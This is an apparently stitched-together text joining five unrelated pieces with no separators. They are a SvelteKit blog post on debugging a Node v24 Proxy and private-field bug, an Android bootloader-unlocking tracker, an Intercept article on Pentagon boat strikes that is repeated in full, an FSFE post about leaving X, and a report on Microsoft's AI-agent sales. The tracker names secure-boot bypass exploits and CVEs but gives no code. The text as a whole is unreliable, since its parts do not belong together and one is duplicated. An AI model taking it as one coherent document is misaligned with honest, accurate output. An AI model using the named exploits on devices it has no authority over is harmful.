There didn’t seem to be a lot around it when I was frantically Googling it during the early phases of “why is this happening to me???”, anyway.
I’ve got a medium-sized SvelteKit app that I’ve been working on-and-off for a few years now (maybe 50k SLOC across a few hundred files) and I recently (finally) took the plunge to update it from Svelte 4 to Svelte 5. It was a pretty painful few days, but at the end of it, I had my app working locally with runes enabled on every single page and component.
There was just one issue – when I pushed my code up to the staging server, it didn’t work :-(
And when I say “didn’t work”, I mean not a single page would load. Not even the main layout would load.
It’s basically impossible to debug an issue in production or even on a staging server, so the first thing was to figure out why, given this issue was 100% reproducible and unavoidable by visiting any page on the staging server, I wasn’t seeing anything wrong when running it locally.
So what’s the difference between how this is running locally and in prod/staging? Who are the main suspects in this murder mystery where my staging server is the tragic victim?
Well, the main thing is that when I run it locally, I use
pnpm dev
whereas in prod, I use the
Node Adapter
running inside Docker. This narrows it down somewhat – here are the main suspects:
The staging server gives me no information in the interface/browser console, but if I dig through the container logs I can see a single error message:
Unable to retrieve user dashboard: TypeError: Cannot read private member #state from an object whose class did not declare it
at Proxy.clone (node:internal/deps/undici/undici:10027:31)
at UsersApi.fetchApi (file:///app/build/server/chunks/runtime-BIi4o4oJ.js:170:30)
at process.processTicksAndRejections (node:internal/process/task_queues:103:5)
at async UsersApi.request (file:///app/build/server/chunks/runtime-BIi4o4oJ.js:90:22)
at async UsersApi.getCurrentUserDashboardRaw (file:///app/build/server/chunks/UsersApi-D2Mg9-4e.js:110:22)
at async UsersApi.getCurrentUserDashboard (file:///app/build/server/chunks/UsersApi-D2Mg9-4e.js:126:22)
at async load (file:///app/build/server/chunks/12-CIrAv-H7.js:16:23)
at async fn (file:///app/build/server/index.js:3022:14)
at async load_data (file:///app/build/server/index.js:3013:18)
at async file:///app/build/server/index.js:4639:18
Ahah, our first clue! 🔎
Okay, so it looks like the frontend is trying to hit the REST API to get user information to load the main dashboard, and it’s hitting an error inside some internal node dependency called “undici” 🤔
This is a bit weird – my code is the next stack up, in
UsersApi.fetchApi
– this code is auto-generated using
OpenAPI Generator’s typescript-fetch generator
, meaning it has been auto-generated from the OpenAPI specification of my REST API. That hasn’t changed in the recent upgrade, so it must be one of the dependencies that I updated…
This is all a bit weird as the actual error is happening inside an internal node dependency, undici . I haven’t bumped my Node version itself so this clue confuses me greatly.
Let’s check out my code that’s creating the error. The stack trace is from a prod build so it’s giving me a line number form the built chunk, but that’s fine. Here’s the code:
163
...
164
for (const middleware of this.middleware) {
165
if (middleware.post) {
166
response = await middleware.post({
167
fetch: this.fetchApi,
168
url: fetchParams.url,
169
init: fetchParams.init,
170
response: response.clone()
171
}) || response;
172
}
173
}
174
...
Okay, so
response.clone()
is where the error is happening. The
response
object is an instance of
Response
coming from
fetch()
which is what the undici library provides, but the stack trace doesn’t say
Response.clone()
, it says
Proxy.clone()
… Another mystery 🤔
But what does the actual error mean? Apparently I have been living under a TypeScript rock for the last few years, because I don’t think I’ve ever actually seen anyone using
#my-element
in JavaScript before, even though it’s been
deployed to V8 since 2019
.
Anyway, if you have a class in JavaScript with an element (
MDN says not to call them properties
because property implies some attributes which these private elements don’t have but you can mentally replace “element” with “field or method”) whose name starts with
#
the JavaScript runtime enforces that this element cannot be accessed from outside the class – they are private.
This kind of makes sense – the stack trace says
Proxy.clone()
, not
Response.clone()
, but it is the undici
Response
class that defines the private
#state
field. You can see the code for yourself on
nodejs/undici
. The
Proxy
class isn’t allowed to see
Response
class’s privates – they just don’t have that kind of relationship.
So now the question is: who’s doing the proxying???
Like Dr. House barely 10 minutes into the episode 1 , I was convinced that Sentry was the culprit – I had updated the library and the update was doing something stupid. As an error handling/tracing library, it must be proxying the response so that it can determine whether it is an error response to report back to the Sentry server.
It’s perfect – it fits all the symptoms and explains why I’m not seeing the issue locally (I disable Sentry in local dev environment). 2
As such, I prescribed an immediate Sentry-ectomy, removing all the Sentry code whatsoever and pushing the update up to staging, confident that my clinical intervention would immediately resolve the issue and reveal the culprit as Sentry.
The result? Still broke. The patient was still dying. The murderer remained at large. The dominoes of my Sentry theory had fallen like a house of cards – checkmate.
At this point I thought that it must be something to do with running inside Docker or using the Node Adapter, so I:
pnpm build
and
node --env-file=.env build
– no issue.
docker build -t my-app .
and
docker run --network=host --rm --env-file=.env my-app
– no issue.
This was getting weird now.
At this point, we need more clues. This is probably the bit of the episode where Dr. House intentionally makes the patient worse to try to figure out what the underlying issue is.
Luckily, we have a more precise surgical tool to figure out who is using
Proxy
, and the answer is…
Proxy
.
What exactly does
Proxy
do? Well, if you want to attach additional functionality to a pre-existing class or function, you can wrap it in a proxy and insert your own code into the process. This is especially useful for things like tracing, which is why I (unfairly) blamed Sentry earlier.
Here’s an example:
1
const originalLog = console.log;
2
console.log = new Proxy(originalLog, {
3
apply(target, thisArg, args) {
4
const convertedArgs = args.map(arg => {
5
if (typeof arg === 'string') {
6
return arg
7
.split('')
8
.map((char, i) => (i % 2 === 0 ? char.toLowerCase() : char.toUpperCase()))
9
.join('');
10
}
11
return arg;
12
});
13
14
return Reflect.apply(target, thisArg, convertedArgs);
15
}
16
});
So what does this strange-looking code do? Let’s try it out:
» console.log("The quick brown fox jumps over the lazy dog")
← tHe qUiCk bRoWn fOx jUmPs oVeR ThE LaZy dOg
Now you can successfully make everything that logs to your console sound ✨ sardonic and disingenuous ✨ I call it spongelog (trademark pending).
For those lucky of you who haven’t come across
Reflect
and/or
apply
yet, invoking a function like
myClass.doSomethingNow(arg1, arg2)
is the same as doing
myClass.doSomethingNow.apply(myClass, [arg1, arg2])
which is also the same as doing
myClass.call(myClass, arg1, arg2)
which is the same as
Reflect.apply(myClass.doSomethingNow, myClass, [arg1, arg2])
… Yeah, this is what JavaScript is like. Keep adding newer, more “modern” ways of doing the same things without ever removing the old ways.
So how can we proxy-ception our response to find our culprit?
1
const OriginalProxy = Proxy;
2
globalThis.Proxy = new Proxy(OriginalProxy, {
3
construct(target, args, newTarget) {
4
// We can proxying the creation of a proxy, so the first arg to the
5
// constructor is the object we're proxying. We only care about code
6
// that's proxying the response.
7
const proxiedClass = args[0].constructor.name;
8
if (proxiedClass === "Response") {
9
console.trace("Creating response Proxy");
10
}
11
return Reflect.construct(target, args, newTarget);
12
},
13
});
This time we are intercepting the constructor of the
Proxy
class so that we can find what piece of code is doing
new Proxy(response, ...)
. When you do
new Proxy()
, the first argument is the thing we’re proxying, so we want to find who is doing
new Proxy()
on something whose first argument is an instance of class
Response
from undici – we can do this by getting the
name of the constructor
which is the same as the name of the class. (It’s possible that there’s another class called
Response
elsewhere in the code, but unlikely.)
Don’t be silly and accidentally put this code somewhere where it runs on every request, or you’ll end up with exponential explosion of
console.trace
calls as each new proxy triggers the other proxies and adds another trace to the pile, like the logging equivalent of a nuclear bomb… Not that I did that or anything, that would be stupid haha…
Here’s the single trace that showed:
Trace: Creating response Proxy
at Object.construct (.../src/hooks.server.ts:20:17)
at universal_fetch (.../node_modules/.pnpm/@[email protected]_@[email protected]_@[email protected]_svelte_1a81703e589b392db9a0fd6d8f25cd68/node_modules/@sveltejs/kit/src/runtime/server/page/load_data.js:331:17)
at process.processTicksAndRejections (node:internal/process/task_queues:105:5)
The first frame at
hooks.server.ts
is just where my code that is creating my proxy-ception is running so we can ignore that. The culprit is
@sveltejs/kit/src/runtime/server/page/load_data.js
.
Here’s an abbreviation of what the code is doing:
1
const proxy = new Proxy(response, {
2
get(response, key, _receiver) {
3
// Lots of SvelteKit-specific functionality which isn't relevant for us
4
// ...
5
6
return Reflect.get(response, key, response);
7
}
8
});
this
all about then?
So what’s the issue with this? Well, prior to my raising a bug in the SvelteKit repo, there was precisely one mention of this specific bug:
nodejs/undici#4290
which explains that when you proxy an object that has methods, doing
obj[key]
or
Reflect.get(obj, key, obj)
will get the method from the object
3
but it will not bind the resulting method to
obj
. Normally, this doesn’t matter, but when you’re proxying an object, the
this
will be bound not to the object but to the proxy instance itself.
This explains why the stack trace was showing
Proxy.clone()
instead of
Response.clone()
because when
clone()
was running,
this
was an instance of
Proxy
, not an instance of
Response
.
You might be wondering why this issue only occurred in prod/staging and not locally. The answer is that I was being stupid 4 .
I was convinced that the reason this was happening was because of this big Svelte upgrade that I just did, but the truth is that it’s completely unrelated and this just happened to be the first update I’d made to the app since
node:lts
Docker image changed from Node v22 to Node v24 in October 2025.
In the CI pipeline, it was Node v24 that was being pulled instead of v22 – the
#state
private field was introduced in v24 so that is why the issue was not showing before.
As to why it wasn’t showing when I run it locally using Docker – my Docker was using a cache
node:lts
image which was the old v22 one. 🤦🏻♂️
I tried verifying this by doing
fnm use 24
followed by
pnpm dev
, but the bug was still mysteriously missing.
It is at this point that I found out that pnpm has its own node version manager built-in, which you can change using
pnpm use --global 24
. If you want to be sure, you can do
pnpm exec node --version
to tell you.
So not only can pnpm manage its own version using the
packageManager
field in
package.json
, it can also manage the
node
version. What a crazy world we live in.
With the pnpm-managed node version set to 24, sure enough the issue was present locally. Applying the quick fix recommended in the
undici GitHub issue
as a manual patch to the library files in
node_modules
fixed the issue:
1
const proxy = new Proxy(response, {
2
get(response, key, _receiver) {
3
get(response, key, receiver) {
4
// Lots of SvelteKit-specific functionality which isn't relevant for us
5
// ...
6
7
return Reflect.get(response, key, response);
8
const value = Reflect.get(response, key, response);
9
10
if (value instanceof Function) {
11
// On Node v24+, the Response object has a private element #state – we
12
// need to bind this function to the response in order to allow it to
13
// access this private element. Defining the name and length ensure it
14
// is identical to the original function when introspected.
15
return Object.defineProperties(
16
/**
17
* @this {any}
18
*/
19
function () {
20
return Reflect.apply(value, this === receiver ? response : this, arguments);
21
},
22
{
23
name: { value: value.name },
24
length: { value: value.length }
25
}
26
);
27
}
28
29
return value;
30
}
31
});
Object.defineProperties()
nonsense?
This is probably not needed, but the recommended fix from MDN returns a bound method that is slightly different from the original. You can see this by comparing the 2 different methods:
1
class Person {
2
#hunger = "hungry";
3
4
status(name, email) {
5
return `I am ${name} <${email}> and I am ${this.#hunger}`;
6
}
7
};
8
9
const me = new Person();
10
11
brokenProxy = new Proxy(me, {
12
get(target, prop, receiver) {
13
return Reflect.get(target, prop, receiver);
14
}
15
})
16
17
plainProxy = new Proxy(me, {
18
get(target, prop, receiver) {
19
const value = Reflect.get(target, prop, receiver);
20
21
if (value instanceof Function) {
22
return function (...args) {
23
return value.apply(target, args);
24
}
25
}
26
27
return value;
28
}
29
});
30
31
fancyProxy = new Proxy(me, {
32
get(target, prop, receiver) {
33
const value = Reflect.get(target, prop, receiver);
34
35
if (value instanceof Function) {
36
// On Node v24+, the Response object has a private element #state – we
37
// need to bind this function to the response in order to allow it to
38
// access this private element. Defining the name and length ensure it
39
// is identical to the original function when introspected.
40
return Object.defineProperties(
41
function () {
42
return Reflect.apply(value, this === receiver ? target : this, arguments);
43
},
44
{
45
name: { value: value.name },
46
length: { value: value.length }
47
}
48
);
49
}
50
51
return value;
52
}
53
});
Here are the differences:
» brokenProxy.status("Drew", "[email protected]")
⚠︎ brokenProxy.status()
Uncaught TypeError: can't access private field or method: object is not the right class
status debugger eval code:5
<anonymous> debugger eval code:1
» plainProxy.status("Drew", "[email protected]")
← "I am Drew <[email protected]> and I am hungry"
» plainProxy.status.name
← ""
» plainProxy.status.length
← 0
» fancyProxy.status("Drew", "[email protected]")
← "I am Drew <[email protected]> and I am hungry"
» fancyProxy.status.name
← "status"
» fancyProxy.status.length
← 2
As expected, the original proxy is broken as
this
is not bound and so the privacy of the
Person.#hunger
field is violated. Both the plain and fancy proxies work when invoked, when you look at their name and length (the latter being the number of arguments), they are different.
Some JavaScript code will introspect a method to see what the name and length are for various (somewhat hacky) reasons. (There’s a lot of bad JavaScript code out there, trust me – I only wrote some of it.) This is probably pretty unlikely, but if you thought this was a bad bug to find, just think about how nasty it would be to track down some stray code that was introspecting the name and/or length of some random method on response and making faulty assumptions based on the incorrect values presented by the proxied method 🤢
I created a PR with this fix whereupon it was quickly merged and within 4 days it was bundled into the next SvelteKit release – this project is really actively maintained.
I was quite surprised that this wasn’t picked up by anyone else – after all, any call to
response.clone()
where the
response
comes from SvelteKit’s
fetch()
inside a page load handler would trigger this bug as long as you’re on Node v24+. I guess cloning responses isn’t a very common thing to do? 🤷🏻
Regardless, the murderer is serving hard time, the patient is recovering, and I can go touch some grass and not think about JavaScript for a while.
If House was so clever, he would know that his first guess isn’t right because it’s only 10 minutes into the episode but hey, I’m not the one with the medical degree. ↩
I am mixing the metaphors a little here – first it’s a murder, now it’s a diagnostic mystery – just stick with it. ↩
If you’re wondering what the difference is between
obj[key]
and
Reflect.get(obj, key, obj)
, it only makes a difference when
key
has a getter defined on
obj
which means that doing
obj[key]
actually invokes the getter method –
Reflect.get()
ensures that
this
is correctly bound to
obj
when the getter is invoked.
↩
To be fair, this is generally a decent bet. ↩
Keeping track of companies that "care about your data 🥺"
Over the past few years, a suspicious number of companies have started to "take care of your data", aka block/strictly limit your ability to unlock the bootloader on your own devices.
While this may not affect you directly, it sets a bad precedent. You never know what will get the axe next: Shizuku? ADB?
They've already gone after sideloading .
I thought it might be a good idea to keep track of bad companies and workarounds.
If you know of specific details/unlocking methods, please PR them or drop them in the discussions
Caution
Reminder that no matter how nice a company is,
you should not trust them unless their unlock process is 100% offline!
The following manufacturers have made it completely impossible to unlock their devices without a workaround.
Note
Phone brands handle carrier locks differently, so check your device manual or contact support.
Carrier locked devices are the ones you get after making a commitment with a carrier of your choice. This is quite common in North America and (supposedly) allows you to save some money on your device.
As a rule, almost all carrier locked devices do not allow the bootloader to be unlocked. This usually makes sense, as it would allow you to completely bypass the contract. The problem is that many devices still do not allow you to unlock the bootloader even after the carrier lock has been lifted. For more details, see the carriers page .
The following manufacturers allow unlocking under certain conditions, such as region, model, SOC, etc., or require a sacrifice to unlock.
The following manufacturers require an online account and/or a waiting period before unlocking.
Custom Android Verified Boot keys is a feature which allows you to run a custom OS with a locked bootloader.
It's rare to see a device which supports custom AVB keys, but some devices can be found here .
Kirin 620, 650, 655, 658, 659, 925, 935, 950, 960:
It's possible to unlock using testpoints and
PotatoNV
(Read the readme)
If you own a MediaTek device exploitable by
mtkclient
you can unlock the bootloader using that.
If it also happens to be an OPPO/Realme device and you need to access fastboot:
lkpatcher
(
web version
)
There's no Universal Qualcomm method, unfortunately.
Although some of these might work for you:
The general exploit:
alephsecurity.com
the bootloader unlock section.
Xiaomi Mi A1 and maybe all MSM89** manufactured before 2018:
EDLUnlock
If you own a phone with the Unisoc UMS9620 or older,you can use this exploit to achieve temporary secure boot bypass and persistently unlock bootloader(except some devices with modified uboot) CVE-2022-38694_unlock_bootloader
If you own a phone with the Unisoc UMS312 UMS512 UD710,you can use this exploit to achieve persistently secure boot bypass, which means all firmwares including splloader,uboot can be modified and resigned. CVE-2022-38691_38692
Otherwise, you can also look into this:
Spectrum_UnlockBL_Tool
This:
xdaforums.com
Or this:
subut
After Pentagon Press Secretary Kingsley Wilson declared the War Department was certain about the identities of supposed drug smugglers killed in boat strikes, Rep. Chrissy Houlahan, D-Pa., had some questions about the intelligence. When Houlahan called on Wilson to appear before Congress, however, the outspoken and controversial spokesperson suddenly went silent.
“I can tell you that every single person who we have hit thus far who is in a drug boat carrying narcotics to the United States is a narcoterrorist. Our intelligence has confirmed that, and we stand by it,” Wilson said on Tuesday during a pseudo Pentagon press briefing where attendance was limited to media that have agreed to limits on the scope of their reporting.
“[O]ur intelligence absolutely confirms who these people are,” she said. “I can tell you that, without a shadow of a doubt, every single one of our military and civilian lawyers knows that these individuals are narcoterrorists.”
In exclusive comments to The Intercept, Houlahan expressed her doubts and demanded proof.
“If there is intelligence that ‘absolutely confirms’ this — present it. Come before the House or Senate Intelligence committees and let Congress provide the proper oversight and checks and balances the American people deserve,” said Houlahan, who serves on the House Armed Services Committee and the House Permanent Select Committee on Intelligence. “Put the whispers and doubts to rest once and for all. If there is intelligence to ‘absolutely confirm’ this, the Congress is ready to receive it. Until we all see it, you can surely understand why we are skeptical.”
Both the House Armed Services Committee and the House Permanent Select Committee on Intelligence, both of which Houlahan serves on, routinely receive classified briefings from the military.
Wilson – who touted a “new era” of working to “keep the American people informed and to ensure transparency” on Tuesday – did not respond to questions or requests for comment from The Intercept about Houlahan’s remarks or appearing before Congress.
In past classified briefings to lawmakers and Congressional staff, the military has admitted that it does not know exactly who it’s killing in the boat strikes, according to seven government officials who have spoken with The Intercept.
Rep. Sara Jacobs, D-Calif., also a member of the House Armed Services Committee, said that Pentagon officials who briefed her admitted that the administration does not know the identities of all the individuals who were killed in the strikes.
“They said that they do not need to positively identify individuals on the vessels to do the strikes,” Jacobs told The Intercept in October . “They just need to show a connection to a DTO or affiliate,” she added, using shorthand for “ designated terrorist organizations ,” the Trump administration’s term for the secret list of groups with whom it claims to be at war.
The military has carried out 21 known attacks, destroying 22 boats in the Caribbean Sea and eastern Pacific Ocean since September and killing at least 83 civilians . It has not conducted a strike on a vessel since November 15.
Since the strikes began, experts in the laws of war and members of Congress from both parties say the strikes are illegal extrajudicial killings because the military is not permitted to deliberately target civilians — even suspected criminals — who do not pose an imminent threat of violence.
The summary executions mark a major departure from typical practice in the long-running U.S. war on drugs , where law enforcement agencies arrest suspected drug smugglers.
A double-tap strike during the initial September 2 attack — where the U.S. hit an incapacitated boat for a second time, killing two survivors clinging to the wreckage — added a second layer of illegality to strikes that experts and lawmakers say are already tantamount to murder . The double-tap strike was first reported by The Intercept .
War Secretary Pete Hegseth has been under increasing fire for that strike . The Washington Post recently reported that Hegseth personally ordered the follow-up attack, giving a spoken order “to kill everybody.”
Hegseth acknowledged U.S. forces conducted a follow-up strike on the alleged drug boat during a Cabinet meeting at the White House on Tuesday but distanced himself from the killing of people struggling to stay afloat.
“I didn’t personally see survivors,” Hegseth told reporters, noting that he watched live footage of the attack. “The thing was on fire. It was exploded in fire and smoke. You can’t see it.”
He added, “This is called the fog of war.”
Hegseth said Adm. Frank M. Bradley , then the commander of Joint Special Operations Command, or JSOC, and now head of Special Operations Command, “made the right call” in ordering the second strike, which the war secretary claimed came after he himself left the room. In a statement to The Intercept earlier this week, Special Operations Command pushed back on the contention that Bradley ordered a double-tap attack .
“He does not see his actions on 2 SEP as a ‘double tap,’” Col. Allie Weiskopf, the director of public affairs at Special Operations Command, told The Intercept on Tuesday .
Bradley and Gen. Dan Caine, the chair of the Joint Chiefs of Staff, are slated to go to Capitol Hill on Thursday to answer questions about the attack amid an ongoing uproar. Congressional staffers say that Bradley is currently slated to only meet with House Armed Services Committee Chair Mike Rogers, R-Ala., and ranking member Rep. Adam Smith, D-Wash., along with the Senate Armed Services Committee Chair Roger Wicker, R-Miss., and ranking member Sen. Jack Reed, D-R.I.
Houlahan was one of six Democratic members of Congress who appeared in a video late last month reminding members of the military of their duty not to obey illegal orders. President Donald Trump called for the group to face arrest and trial or even execution , saying the video amounted to “SEDITIOUS BEHAVIOR FROM TRAITORS.”
Wilson, during her faux press briefing — delivered to mostly administration cheerleaders after outlets from the New York Times to Fox News relinquished their press passes rather than agree to restrictions that constrain reporters’ First Amendment rights —called out Houlahan and her fellow lawmakers in the video.
“[T]he Seditious Six urged members of our military to defy their chain of command in an unprecedented, treasonous and shameful conspiracy to sow distrust and chaos in our armed forces,” said Wilson. She went on to call the video “a politically motivated influence operation” that “puts our warfighters at risk.”
Hegseth described the members of Congress’s video as “despicable, reckless, and false.” Hegseth himself, however, had delivered a similar message recorded in 2016 footage revealed by CNN on Tuesday.
“If you’re doing something that is just completely unlawful and ruthless, then there is a consequence for that. That’s why the military said it won’t follow unlawful orders from their commander-in-chief,” Hegseth told an audience in the footage. “There’s a standard, there’s an ethos, there’s a belief that we are above what so many things that our enemies or others would do.”
Wilson did not reply to a request for comment about Hegseth’s remarks.
Hegseth is also on the hotseat after the Pentagon’s Inspector General’s Office determined that he risked the safety of U.S. service members by sharing sensitive military information on the Signal messaging app, according to a source familiar with the forthcoming report by the Pentagon watchdog.
The report, which is expected to be released on Thursday, was launched after a journalist at The Atlantic revealed he had been added to a chat on the encrypted messaging app in which Hegseth and other top officials were discussing plans for U.S. airstrikes in Yemen that also killed civilians .
After Pentagon press secretary Kingsley Wilson declared the War Department was certain about the identities of supposed drug smugglers killed in boat strikes, Rep. Chrissy Houlahan, D-Pa., had some questions about the intelligence. When Houlahan called on Wilson to appear before Congress, however, the outspoken and controversial spokesperson suddenly went silent.
“I can tell you that every single person who we have hit thus far who is in a drug boat carrying narcotics to the United States is a narcoterrorist. Our intelligence has confirmed that, and we stand by it,” Wilson said on Tuesday during a pseudo Pentagon press briefing where attendance was limited to media outlets that have agreed to limits on the scope of their reporting.
“Our intelligence absolutely confirms who these people are,” she said. “I can tell you that, without a shadow of a doubt, every single one of our military and civilian lawyers knows that these individuals are narcoterrorists.”
In exclusive comments to The Intercept, Houlahan expressed her doubts and demanded proof.
“If there is intelligence that ‘absolutely confirms’ this — present it. Come before the House or Senate Intelligence committees and let Congress provide the proper oversight and checks and balances the American people deserve,” said Houlahan, who serves on the House Armed Services Committee and the House Permanent Select Committee on Intelligence. “Put the whispers and doubts to rest once and for all. If there is intelligence to ‘absolutely confirm’ this, the Congress is ready to receive it. Until we all see it, you can surely understand why we are skeptical.”
Both the House Armed Services Committee and the House Permanent Select Committee on Intelligence, both of which Houlahan serves on, routinely receive classified briefings from the military.
Wilson — who touted a “new era” of working to “keep the American people informed and to ensure transparency” on Tuesday — did not respond to questions or requests for comment from The Intercept about Houlahan’s remarks or appearing before Congress.
In past classified briefings to lawmakers and congressional staff, the military has admitted that it does not know exactly who it’s killing in the boat strikes , according to seven government officials who have spoken with The Intercept.
Rep. Sara Jacobs, D-Calif., also a member of the House Armed Services Committee, said that Pentagon officials who briefed her admitted that the administration does not know the identities of all the individuals who were killed in the strikes.
“They said that they do not need to positively identify individuals on the vessels to do the strikes,” Jacobs told The Intercept in October. “They just need to show a connection to a DTO or affiliate,” she added, using shorthand for “ designated terrorist organizations ,” the Trump administration’s term for the secret list of groups with whom it claims to be at war.
The military has carried out 21 known attacks, destroying 22 boats in the Caribbean Sea and eastern Pacific Ocean since September and killing at least 83 civilians . It has not conducted a strike on a vessel since November 15.
Since the strikes began, experts in the laws of war and members of Congress from both parties say the strikes are illegal extrajudicial killings because the military is not permitted to deliberately target civilians — even suspected criminals — who do not pose an imminent threat of violence.
The summary executions mark a major departure from typical practice in the long-running U.S. war on drugs , where law enforcement agencies arrest suspected drug smugglers.
A double-tap strike during the initial September 2 attack — where the U.S. hit an incapacitated boat for a second time, killing two survivors clinging to the wreckage — added a second layer of illegality to strikes that experts and lawmakers say are already tantamount to murder. The double-tap strike was first reported by The Intercept .
War Secretary Pete Hegseth has been under increasing fire for that strike. The Washington Post recently reported that Hegseth personally ordered the follow-up attack, giving a spoken order “to kill everybody.”
Hegseth acknowledged U.S. forces conducted a follow-up strike on the alleged drug boat during a Cabinet meeting at the White House on Tuesday but distanced himself from the killing of people struggling to stay afloat.
“I didn’t personally see survivors,” Hegseth told reporters, noting that he watched live footage of the attack. “The thing was on fire. It was exploded in fire and smoke. You can’t see it.”
He added, “This is called the fog of war.”
Hegseth said Adm. Frank M. Bradley , then the commander of Joint Special Operations Command and now head of Special Operations Command, “made the right call” in ordering the second strike, which the war secretary claimed came after he himself left the room. In a statement to The Intercept earlier this week, Special Operations Command pushed back on the contention that Bradley ordered a double-tap attack.
“He does not see his actions on 2 SEP as a ‘double tap,’” Col. Allie Weiskopf, the director of public affairs at Special Operations Command, told The Intercept on Tuesday.
Bradley and Gen. Dan Caine, the chair of the Joint Chiefs of Staff, are slated to go to Capitol Hill on Thursday to answer questions about the attack amid an ongoing uproar. Congressional staffers say that Bradley is currently slated to only meet with House Armed Services Committee Chair Mike Rogers, R-Ala., and ranking member Rep. Adam Smith, D-Wash., along with the Senate Armed Services Committee Chair Roger Wicker, R-Miss., and ranking member Sen. Jack Reed, D-R.I.
Houlahan was one of six Democratic members of Congress who appeared in a video late last month reminding members of the military of their duty not to obey illegal orders. President Donald Trump called for the group to face arrest and trial or even execution , saying the video amounted to “SEDITIOUS BEHAVIOR FROM TRAITORS.”
Wilson, during her faux press briefing — delivered to mostly administration cheerleaders after outlets from the New York Times to Fox News relinquished their Pentagon press passes rather than agree to restrictions that constrain reporters’ First Amendment rights — called out Houlahan and her fellow lawmakers in the video.
“[T]he Seditious Six urged members of our military to defy their chain of command in an unprecedented, treasonous and shameful conspiracy to sow distrust and chaos in our armed forces,” said Wilson. She went on to call the video “a politically motivated influence operation” that “puts our warfighters at risk.”
Hegseth described the members of Congress’s video as “despicable, reckless, and false.” Hegseth himself, however, had delivered a similar message recorded in 2016 footage revealed by CNN on Tuesday.
“If you’re doing something that is just completely unlawful and ruthless, then there is a consequence for that. That’s why the military said it won’t follow unlawful orders from their commander-in-chief,” Hegseth told an audience in the footage. “There’s a standard, there’s an ethos, there’s a belief that we are above what so many things that our enemies or others would do.”
Wilson did not reply to a request for comment about Hegseth’s remarks.
Hegseth is also in the hot seat after the Pentagon Inspector General’s Office determined that he risked the safety of U.S. service members by sharing sensitive military information on the Signal messaging app, according to a source familiar with the forthcoming report by the Pentagon watchdog.
The report, which is expected to be released on Thursday, was launched after a journalist at The Atlantic revealed he had been added to a chat on the encrypted messaging app, in which Hegseth and other top officials were discussing plans for U.S. airstrikes in Yemen that also killed civilians .
on:
The Free Software Foundation Europe deleted its account on X. The platform never aligned with our values and no longer serves as a space for communication. What initially intended to be a place for dialogue and information exchange has turned into a centralised arena of hostility, misinformation, and profit-driven control, far removed from the ideals of freedom we stand for.
Since Elon Musk acquired the social network formerly known as Twitter and rebranded it as X, the Free Software Foundation Europe (FSFE) has been closely monitoring the developments of this proprietary platform, a space we were never comfortable joining, yet one that was once important for reaching members of society who were not active in our preferred spaces for interaction. Over time, it has become increasingly hostile, with misinformation, harassment, and hate speech more visible than ever.
The FSFE initially joined Twitter as it offered a space to promote the Free Software values and to interact with policymakers, journalists, and above all, reaching to people who were not yet familiar with Free Software and its benefits. The social network was another tool the FSFE used to share information about our initiatives, to explain to users their right to control our technology, and to promote software freedom across society, while also encouraging the use of alternative, decentralised social media networks.
However, the current platform direction and climate combined with an algorithm that prioritises hatred, polarisation, and sensationalism, alongside growing privacy and data protection concerns, has led us to the decision to part ways with this platform.
Consequently, the FSFE decided to permanently delete its account on X . We keep being active on some other proprietary platforms in order to reach a wider part of society, journalists, and decision makers.
At the same time, we strongly encourage everyone who shares our commitment to digital freedom and decentralisation to join us in the Fediverse. Unlike proprietary platforms driven by profit and centralised control, the Fediverse empowers users to choose how and where they connect, ensuring transparency, autonomy, and resilience. Follow the FSFE on Mastodon and Peertube !
Report: Microsoft declared “the era of AI agents” in May, but enterprise customers aren’t buying.
Microsoft has lowered sales growth targets for its AI agent products after many salespeople missed their quotas in the fiscal year ending in June, according to a report Wednesday from The Information. The adjustment is reportedly unusual for Microsoft, and it comes after the company missed a number of ambitious sales goals for its AI offerings.
AI agents are specialized implementations of AI language models designed to perform multistep tasks autonomously rather than simply responding to single prompts. So-called “agentic” features have been central to Microsoft’s 2025 sales pitch: At its Build conference in May, the company declared that it has entered “the era of AI agents.”
The company has promised customers that agents could automate complex tasks, such as generating dashboards from sales data or writing customer reports. At its Ignite conference in November, Microsoft announced new features like Word, Excel, and PowerPoint agents in Microsoft 365 Copilot, along with tools for building and deploying agents through Azure AI Foundry and Copilot Studio. But as the year draws to a close, that promise has proven harder to deliver than the company expected.
According to The Information, one US Azure sales unit set quotas for salespeople to increase customer spending on a product called Foundry , which helps customers develop AI applications, by 50 percent. Less than a fifth of salespeople in that unit met their Foundry sales growth targets. In July, Microsoft lowered those targets to roughly 25 percent growth for the current fiscal year. In another US Azure unit, most salespeople failed to meet an earlier quota to double Foundry sales, and Microsoft cut their quotas to 50 percent for the current fiscal year.
The sales figures suggest enterprises aren’t yet willing to pay premium prices for these AI agent tools. And Microsoft’s Copilot itself has faced a brand preference challenge: Earlier this year, Bloomberg reported that Microsoft salespeople were having trouble selling Copilot to enterprises because many employees prefer ChatGPT instead. The drugmaker Amgen reportedly bought Copilot software for 20,000 staffers, but many employees gravitated toward OpenAI’s chatbot instead, with Copilot mainly used for Microsoft-specific tasks like Outlook and Teams.
A Microsoft spokesperson declined to comment on the changes in sales quotas when asked by The Information. But behind these withering sales figures may lie a deeper, more fundamental issue: AI agent technology likely isn’t ready for the kind of high-stakes autonomous business work Microsoft is promising.
The concepts behind agentic AI systems emerged shortly after the release of OpenAI’s GPT-4 in 2023. They typically involve spinning off “worker tasks” to AI models running in parallel with a supervising AI model, and incorporate techniques to evaluate and act on their own results. Over the past few years, companies like Anthropic, Google, and OpenAI have refined those early approaches into far more useful products for tasks like software development, but they are still prone to errors.
At the heart of the problem is the tendency for AI language models to confabulate , which means they may confidently generate a false output that is stated as being factual. While confabulation issues have reduced over time with more recent AI models, as we’ve seen through recent studies, the simulated reasoning techniques behind the current slate of agentic AI assistants on the market can still make catastrophic mistakes and run with them, making them unreliable for the kinds of hands-off autonomous work companies like Microsoft are promising.
While looping agentic systems are better at catching their own mistakes than running a single AI model alone, they still inherit the fundamental pattern-matching limitations of the underlying AI models, particularly when facing novel problems outside their training distribution. So if an agent isn’t properly trained to perform a task or encounters a unique scenario, it could easily draw the wrong inference and make costly mistakes for a business.
The “ brittleness ” of current AI agents is why the concept of artificial general intelligence , or AGI, is so appealing to those in the AI industry. In AI, “general intelligence” typically implies an AI model that can learn or perform novel tasks without having to specifically be shown thousands or millions of examples of it beforehand. Although AGI is a nebulous term that is difficult to define in practice, if such a general AI system were ever developed, it would hypothetically make for a far more competent agentic worker than what AI companies offer today.
